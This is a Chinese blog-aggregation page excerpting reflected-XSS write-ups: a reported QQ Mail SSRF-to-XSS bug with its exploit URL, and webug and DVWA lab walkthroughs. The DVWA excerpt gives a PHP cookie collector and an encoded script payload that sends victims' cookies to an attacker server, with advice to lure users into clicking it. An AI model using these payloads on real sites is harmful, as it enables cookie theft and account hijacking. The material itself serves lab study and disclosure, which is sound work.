精华内容
下载资源
问答
  • QQ邮箱反射型xss漏洞

    千次阅读 2019-06-13 11:20:16
    ……,对,我印象中写过了,刚才...说实话,我对浏览器的安全也不太了解,案头的书翻了几页就没再动过,于是对比了腾讯邮箱的做法,发现了这个xss。 背景 公司使用coremail搭建企业邮箱,开发做了一个通过邮件发送h...

    在这里插入图片描述

    ……,对,我印象中写过了,刚才因为需要要用,搜索了一下,是空的,嘶嘶嘶~可怕~

    起因
    甲方“一个人的安全部”的时候,一个研发的同事在设计一项报表功能时,因为受到邮箱的安全限制无法很好的实现,于是将情况反馈给我。说实话,我对浏览器的安全也不太了解,案头的书翻了几页就没再动过,于是对比了腾讯邮箱的做法,发现了这个xss。

    背景
    公司使用coremail搭建企业邮箱,开发做了一个通过邮件发送html报表的周报,但在此邮件内有链接地址。邮箱的域名是a.com而报表中的链接是b.com,当用户打开a.com内的报表邮件,点击其中的链接;因为邮件的内容是通过iframe来加载html报表,同时coremail将iframe加入了内容安全策略(CSP)限制(sandbox=“allow-same-origin allow-popups”)。所以,点击链接虽然可以跳转到b.com,但b.com页面有js脚本,sandbox不允许执行脚本(allow-scripts),会导致新打开的链接不会加载脚本执行,效果当然也不是开发想要的效果了。
    在这里插入图片描述

    当然通过让厂商修改iframe的sandbox属性,改为sandbox=”allow-same-origin allow-popups allow-popups-to-escape-sandbox”,即可解决这个问题,但会影响邮箱的安全性。

    于是我打开qq邮箱,发现QQ邮箱并没有这个iframe策略,而是通过一个三方“云端安全检测”,对邮件内连接进行拦截,提示用户要访问的页面可能有风险。
    在这里插入图片描述
    被src拒绝的“逻辑漏洞”
    于是多打开了几封QQ邮件,点击了邮件内的链接,发现腾讯对智联招聘、拉钩等招聘网站的链接不会进行拦截,直接放行跳转,所以这其中是否存在一定的逻辑绕过呢?

    测试过程就省略了,说结果吧,个人认为验证逻辑上还是有些问题:

    当邮件内容出现链接时,点击跳转,默认QQ邮箱会进行在云端进行拦截检测。但是会有白名单机制,比如 http://www.lagou.com ,会把拉钩的招聘链接进行放行,云端安全检测检->进行跳转放行,无任何提示。

    现有的逻辑如下:https://www.lagou.com 不放行(因为https,非白名单)www.lagou.com 不放行(不带有http,非白名单)http://xss.pirogue.org 不放行(非白名单)等等其他域名都不放行。
    但当第一行是http://www.lagou.com ,第二行的链接都会放行(除去色情或被举报的网址)。

    比如:
    在这里插入图片描述
    两个链接都会进行跳转。

    如果第一个是http://www.lagou.com ,第二行的网址是一个钓鱼或挂马的链接,却没有被举报。那用户便可能会受到攻击。

    但此ssrf限制了域名,比如.qq.com,.soso.com,等等腾讯自己的域名。所以除非你能再挖到腾讯自己的域名下的漏洞来结合使用。可是我们还可以测试一下是否可以绕过域名的白名单机制。

    鸡肋ssrf变身反射型xss
    ssrf漏洞

    原功能链接:
    https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://x.soso.com/js/xf/xflib2.0.js

    这个cgi读取到了js的内容
    在这里插入图片描述
    漏洞截图:
    https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://ip.qq.com/
    在这里插入图片描述

    但此ssrf限制了域名,比如.qq.com,.soso.com,等等腾讯自己的域名。所以除非你能再挖到腾讯自己的域名下的漏洞来结合使用。

    可是我们还可以测试一下是否可以绕过域名的白名单机制。

    反射型xss漏洞

    于是我构造了如下的url,成功绕过了白名单,提交了此漏洞:

    构造的恶意链接:
    http://mail.qq.com.pirogue.org/qq.com.html
    内容如下:
    在这里插入图片描述

    Exp:https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://mail.qq.com.pirogue.org/qq.com.html
    

    在这里插入图片描述
    仔细看url链接里面存在一个sid,在后来的tsrc自测时发现,此sid只能是收件人的sid才能触发漏洞。额,有点self-xss的意思咯。但tsrc还是根据可能的危害程度,给了漏洞中危的回复。

    结语
    之前在搞一个目标的时候还挖到了一个QQ企业邮箱的存储型xss,但那个存储型xss没啥技术含量,而这个反射的起因到结果还是挺有趣的,所以迫不及待的想分享给大家。

    展开全文
  • webug 4.0 第九关 反射型xss

    千次阅读 2019-04-22 17:10:33
    WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境...

    感谢webug团队一直以来的更新维护!

    webug是什么

    WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。

    Webug官网:http://www.webug.org

    Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43BuOjhPqkJBvcw 提取码: 3xpy

    来源:226安全团队

    微信号:safeteam226

    开始打靶

    反射型xss

    反射型XSS也被称为非持久性CSS。当用户访问一个带有XSS代码的URL请求时,服务器端接收数据后处理,然后把带有XSS代码的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,最终造成XSS漏洞。这个过程就像一次反射,故称为反射型XSS。

    (来源于:https://www.cnblogs.com/Garvey/p/6062910.html)

    用处

    你可以构造跨站语句,作用是抓取本次访问的cookie发送到你的接受服务器,然后把这个欺骗URL发给目标诱导他打开。获取到这个cookie之后你就能用目标的身份访问网站了,当然这不是百分百行得通的

    注入

    1、访问http://192.168.136.130/control/xss/xss_1.php?id=请问阿斯顿自行车,一个很长的字符串

    2、右键查看源代码,查看字符串的位置了,确认是否可以XSS
    在这里插入图片描述

    3、试验最简单的xss,<(去掉这个)script>alert(‘XSS’)</(去掉这个)script>

    访问http://192.168.136.130/control/xss/xss_1.php?id=<(去掉这个)script>alert(‘XSS’)</(去掉这个)script>

    成功弹出在这里插入图片描述
    4、获取cookie

    访问http://192.168.136.130/control/xss/xss_1.php?id=<(去掉这个)script>alert(document.cookie)</(去掉这个)script>

    成功弹出在这里插入图片描述
    5、学习:百度谷歌“XSS平台”,里面有很多你知道以及不知道的姿势

    6、注意:谷歌浏览器有xss检测,在快捷方式后面加上–args --disable-xss-auditor
    在这里插入图片描述

    展开全文
  • 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户...

    思路:

    • 搭建能接收cookie的服务器
    • 构建带有XSS恶意代码的url
    • 发给用户诱导用户点击url
    • 获得用户cookie并利用

    实验环境:
    kali————充当攻击者接收cookie的服务器 192.168.0.53
    DVWA————充当客户要访问的目标网站
    centos7————充当用户客户端

    小试牛刀:

    一、搭建服务器

    1. kali开启Apache服务
    systemctl start apache2
    2. 创建接收cookie的php页面
    2.1 在/var/www/html下创建能接收cookie的php页面
    vim test.php 内容如下

    <?php
    $cookie = $_GET['cookie'];	//获取cookie值
    file_put_contents('cookie.txt',$cookie);	//将获取的cookie值写入到cookie.txt中
    ?>
    

    2.2 创建能存储cookie的cookie.txt文本

    touch cookie.txt
    

    2.3 给test_xss.php和cookie.txt授权

    #查看Apache用的什么权限
    ps -aux | grep apache
    # 授权
    chown www-data:www-data test.php
    chown www-data:www-data cookie.txt
    

    在这里插入图片描述
    至此我们就创建好了能接收cookie环境了。http://192.168.0.53/test_xss.php

    二、制作XSS
    1. 构建XSS payload
    <script>
    document.location='http://192.168.0.53/test.php?cookie='+document.cookie
    </scripy>
    

    注:
    document.location 用于跳转页面
    http://192.168.0.53/test_xss.php?cookie='+document.cookie 用于传递cookie到xuegod.php

    完整的url

    http://192.168.0.107/dvwa/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.0.53/test_xss.php?cookie='+document.cookie</script>
    
    1. 加密url连接
      带有‘js脚本’的连接,有时服务器会拒绝,所以我们要对url进行加密
      打开bp,对
    http://192.168.0.107/dvwa/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%35%33%2f%74%65%73%74%5f%78%73%73%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%79%3e
    
    三、诱导用户点击

    把加密后的url各种方式让用户点击这个连接,然后我们就能在cookie文件中收集到cookie的信息了

    四、获取cookie并利用
    展开全文
  • 反射xss实验

    2019-04-24 16:37:14
    实验目的: 理解反射性xss的原理,学习反射性xss的实现过程。 实验原理:xss攻击是web攻击中最常见的攻击方法之一,恶意攻击者往web页面里插入恶意html... 实验步骤: 一.简单的反射型xss试验 1.在已经搭建好的实...

    实验目的: 理解反射性xss的原理,学习反射性xss的实现过程。
    实验原理:xss攻击是web攻击中最常见的攻击方法之一,恶意攻击者往web页面里插入恶意html代码,当用户浏览该页时,嵌入其中web里面HTML代码会被执行,从而达到恶意攻击用户的特殊目的。在xss的攻击方式中需要欺骗用户自己去点击链接才能触发xss的称为反射性xss。
    实验步骤:
    一.简单的反射型xss试验
    1.在已经搭建好的实验平台环境下,在浏览器中输入测试路径http:192.168.1.3:8006.input.htm
    在这里插入图片描述

    2.在表单中输入 hello,点击提交
    在这里插入图片描述
    3.提交后的结果显示正常
    在这里插入图片描述

    4.在表单中输入xss代码,如图所示点击提交
    在这里插入图片描述
    5.提交后结果显示如图,浏览器弹出对话框,显示我们输入的内容

    在这里插入图片描述

    以上即为简单的xss反射型实验

    展开全文
  • 反射型XSS跨站脚本攻击和防御

    千次阅读 2020-07-05 10:51:32
    在前面的文章中,讲述了最好懂的存储型XSS攻击和防御,本文来聊聊反射型XSS,所谓反射,就像镜子一样,一束光发过去,立即弹回来。这里依赖于微博服务器存在反射XSS漏洞。那么,坏人C为什么不自己搭建一个反射服务器...
  • xss反射型

    2020-11-04 10:35:53
    1.反射型xss原理 一. 将DVWA的难度级别设置为low 二. 尝试一般的xss攻击 <script>alert(1)</script> <body onload=alert(2)> <a href='' onclick=alert(3)>click1</a> #点击click1时...
  • 反射型 这道题用我自己之前搭建xss平台没做出来,参考了别人的WP才做出来,我自己搭建的是bluelotus,但是获取的cookie不是flag,这个就不知道是为什么了,然后还有一点就是我的谷歌浏览器把弹窗屏蔽了,走了好多...
  • 分析了反射型XSS、存储型XSS、基于DOM的XSS、来自PDF的XSS、CSRF攻击等几种跨站脚本攻击方式,并使用springboot搭建环境进行演示
  • xss攻击】基础篇

    2020-12-03 17:42:12
    目录0x001 反射型(get)0x002 反射型(post)0x003 存储型xss0x004 DOM型xss0x005 DOM型xss-x0x006 xss之盲打0x007 xss之过滤0x008 xss之htmlspecialchars0x009 xss之href输出0x0010 xss之js输出 以下实验环境:本地...
  • 环境搭建 win7虚拟机搭建dvwa网站 ...首先测试低级的反射型xss,在输入框输入 ,这里利用的是web开发的一些语句,alert是显示警告,如果存在xss攻击就会发出警告 效果图如图所示,这里我们可以看到,存在了xs
  • 通过DVWA学习XSS

    2021-03-14 12:13:18
    dvwa反射型xss 测试环境 一台 win2003 虚拟机,ip 为 192.168.50.128,用wamp集成环境将dvwa搭在8080端口。 一台 win7 虚拟机,ip 为 192.168.50.150,用来接受漏洞网站的cookie,web由phpstudy搭建。 ...
  • xss 跨站脚本攻击分为:反射型,存储型(存储在数据库), 反射型 非持久型,攻击方式具有一次性,每次需要输入弹出,出现在URL中作为参数请求服务器,服务器解析并响应 存储型 持久型,存在服务器上,数据库、文件...
  • 一.XSS—标签内1....在虚拟机搭建DVWA,在本地访问虚拟机的地址,进入DVWA的目录,设置安全等级为low,即可开始测试如图,出现弹窗并在url中能看到XSS语句,说明存在反射型XSS。查看元素,可以看...
  • DVWA--XSS (Reflected)

    2019-09-08 16:31:43
    0x00 测试环境: DVWA:Win 7虚拟机,phpstudy搭建DVWA,存在XSS漏洞的网站;|IP: 192.168.124.6| 主机A:Win 7物理机,开启phpstudy,攻击者;|IP:192.168.124.2| ...0x01 反射型XSS 1、Low级别: PHP源代码...
  • 3.1反射型 3.2存储型 3.3 DOM-based型 四.利用XSS进一步攻击 4.1 Cookie窃取 4.2 CSRF 4.3 XSS钓鱼 4.4 Web Shell 五. XSS防御 5.1输入过滤 5.2输出编码,转义 5.3上下文敏感数据编码 5.4内容安...
  • XSS-LABS 浅谈

    2020-07-26 23:29:26
    顺便也说下靶场搭建吧,简单的github上下载之后,直接解压到你的集成环境里,我用的是phpstudy,就不过多说了,xss注入分为三个类型反射型,dom型还有存储型三种,主要形成的原因就是前端代码对一
  • DVWA通关教程之环境搭建

    千次阅读 2020-07-02 23:00:18
    dvwa环境包含了十个常用模块: 1.Brute Force(暴力(破解)) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含...9.XSS(Reflected)(反射型跨站脚本) 10.XSS(Store.
  • 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQL盲注、弱会话ID、XSS漏洞(DOM型跨站脚本、反射型跨站脚本、 存储型跨站脚本) 环境搭建 由于是本地搭建真实web漏洞...
  • 2020-12-26 dvwa学习汇总

    2020-12-26 17:25:25
    2019-2-17 dvwa学习-环境搭建和sql字符型注入(级别low) 2019-2-19 dvwa学习(2)–Burp suite安装运用,sqlmap的payload简介和数值型注入(级别medium) ...2019-3-4 dvwa学习(6)–反射型XSS攻击 2019-3-6 dvwa学.
  • 注:本篇文章为个人学习笔记仅供学习交流。概述跨站脚本攻击,通常称为XSS,是一种通过代码注入的网站应用程序安全漏洞。...反射型XSS攻击者输入xss代码,提交给服务器,服务器解析后,在响应中返回输入的x...
  • 往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 ...DVWA靶场-XSS(DOM型、反射型、存储型) 靶场环境搭建 https://github
  • 51.反射XSS.mp4 52.domxss.mp4 53.XXSSProtection.mp4 54.CRLF+XSS.mp4 55.xss修补.mp4 56.闭合XSS.mp4 57.搭建XSS平台.mp4 3.csrfxss蠕虫ssrfxxe 58.了解CSRFCSRF攻击.mp4 59.csrf漏洞修补.mp4 60.xss蠕虫.mp4 61....
  • 浅谈CDN、SEO、XSS、CSRF :file_folder:操作系统 操作系统第一篇【引论】 操作系统第二篇【进程管理】 操作系统第三篇【线程】 操作系统第四篇【处理机调度】 操作系统第五篇【死锁】 操作系统第六篇【存储器管理...

空空如也

空空如也

1 2
收藏数 23
精华内容 9
关键字:

反射型xss搭建